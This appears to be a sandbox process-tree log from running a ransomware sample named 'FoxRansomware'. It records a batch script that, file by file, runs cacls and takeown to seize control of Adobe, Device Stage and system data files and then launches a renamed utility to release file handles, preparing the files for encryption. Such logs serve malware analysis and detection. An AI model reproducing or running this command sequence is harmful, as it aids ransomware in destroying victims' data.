C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:5448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:5464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵PID:5516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "brt55.ths" -nobanner3⤵PID:1312
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "brt55.ths" -nobanner4⤵PID:5492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:5148
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:5704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵
- Modifies file permissions
PID:5564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "usa03.hsp" -nobanner3⤵PID:5620
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "usa03.hsp" -nobanner4⤵PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:5764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:5712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵
- Modifies file permissions
PID:5560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:6996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:7040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:5792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵
- Modifies file permissions
PID:5788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:5700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:5784
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:5868
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:5904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "directories.acrodata" -nobanner3⤵PID:5876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "directories.acrodata" -nobanner4⤵PID:5576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:5680
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:5912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "behavior.xml" -nobanner3⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "behavior.xml" -nobanner4⤵PID:6088
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:6004
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:6136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:4492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:7128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:6000
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:2228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:2660
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:6032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:6168
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:6160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "overlay.png" -nobanner3⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "overlay.png" -nobanner4⤵PID:6052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:6268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:6224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:7156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:5476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:5504
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:6244
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:6428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:6384
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:6400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:6520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "watermark.png" -nobanner3⤵PID:6504
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "watermark.png" -nobanner4⤵PID:6252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6420
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:1276
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Modifies file permissions
PID:6568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:2056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:5924
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:6596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:6936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:1260
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:6708
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:6604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:1188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:6844
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:6620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:6616
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:2376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Modifies file permissions
PID:6484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:7076
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:6892
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H""2⤵PID:2500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H" /E /G Admin:F /C3⤵PID:1284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "Help_MTOC_help.H1H" -nobanner3⤵PID:2040
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "Help_MTOC_help.H1H" -nobanner4⤵PID:1676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:2760
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:2584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "device.png" -nobanner3⤵PID:412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "device.png" -nobanner4⤵PID:808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:1692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:6876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:1232
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Modifies file permissions
PID:2320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tasks.xml" -nobanner3⤵PID:2944
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "tasks.xml" -nobanner4⤵PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:1636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:2928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "behavior.xml" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "behavior.xml" -nobanner4⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:2308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:2420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:1004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:2664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:2544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:1376
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:1964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "device.png" -nobanner3⤵PID:2236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "device.png" -nobanner4⤵PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:2132
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:2292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:2988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:2220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:2860
-
-
-
